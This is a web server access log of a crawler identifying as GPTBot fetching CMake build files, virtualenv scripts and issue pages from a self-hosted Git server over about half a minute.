"/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fCMakeFiles%2fMakefile.cmake" [Client 74.7.227.38] [Length 26458] [Gzip 5.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:16:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/.gitignore?display=rendered" [Client 74.7.227.38] [Length 11121] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/.gitignore" +[17/Feb/2026:16:48:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles?display=source" [Client 74.7.227.38] [Length 11554] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:16:48:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets?display=source" [Client 74.7.227.38] [Length 11553] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:16:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh?display=source" [Client 74.7.227.38] [Length 12169] [Gzip 3.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:16:48:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate?display=rendered" [Client 74.7.227.38] [Length 10990] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:16:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer?display=source" [Client 74.7.227.38] [Length 11564] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:16:48:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish?display=source" [Client 74.7.227.38] [Length 13532] [Gzip 3.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:16:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish?display=rendered" [Client 74.7.227.38] [Length 11000] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.fish" +[17/Feb/2026:16:48:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh?display=rendered" [Client 74.7.227.38] [Length 10995] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/activate.csh" +[17/Feb/2026:16:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11040] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:16:48:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11562] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10469] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:16:48:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11561] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 10468] [Gzip 2.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src" +[17/Feb/2026:16:48:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11561] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11559] [Gzip 3.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:48:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" [Client 74.7.227.38] [Length 11549] [Gzip 3.63] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles" +[17/Feb/2026:16:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/labels?sort=alphabetically&state=" [Client 74.7.227.38] [Length 7647] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/labels" +[17/Feb/2026:16:48:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/labels?sort=alphabetically&state=" [Client 74.7.227.38] [Length 7644] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/labels" +[17/Feb/2026:16:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/milestones?sort=name&state=closed" [Client 74.7.227.38] [Length 8497] [Gzip 2.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/milestones?q=&sort=name&state=open" +[17/Feb/2026:16:48:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11851] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old" +[17/Feb/2026:16:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12168] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:48:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11368] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:48:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12167] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:48:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11368] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:48:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12165] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12168] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:48:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12167] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11367] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:48:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 11370] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 11284] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir" +[17/Feb/2026:16:48:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9984] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:16:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 10013] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:48:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12082] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 10015] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:48:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12081] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:48:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 10014] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:48:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 10013] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 10014] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:48:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 116] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:48:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" [Client 74.7.227.38] [Length 10024] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/compiler_depend.ts" +[17/Feb/2026:16:48:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:48:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:48:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" [Client 74.7.227.38] [Length 10006] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" +[17/Feb/2026:16:48:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" +[17/Feb/2026:16:48:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" [Client 74.7.227.38] [Length 12079] [Gzip 5.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" 